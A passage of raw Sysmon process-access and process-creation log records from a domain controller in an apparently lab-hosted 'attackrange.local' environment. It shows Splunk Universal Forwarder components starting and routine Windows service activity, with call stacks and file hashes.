Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.733{08A6967A-432F-6000-EA00-000000009A01}48004788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432F-6000-EA00-000000009A01}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-432F-6000-EA00-000000009A01}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.577{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432F-6000-EA00-000000009A01}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:15.578{08A6967A-432F-6000-EA00-000000009A01}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4330-6000-EC00-000000009A01}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4330-6000-EC00-000000009A01}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.923{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4330-6000-EC00-000000009A01}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.924{08A6967A-4330-6000-EC00-000000009A01}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 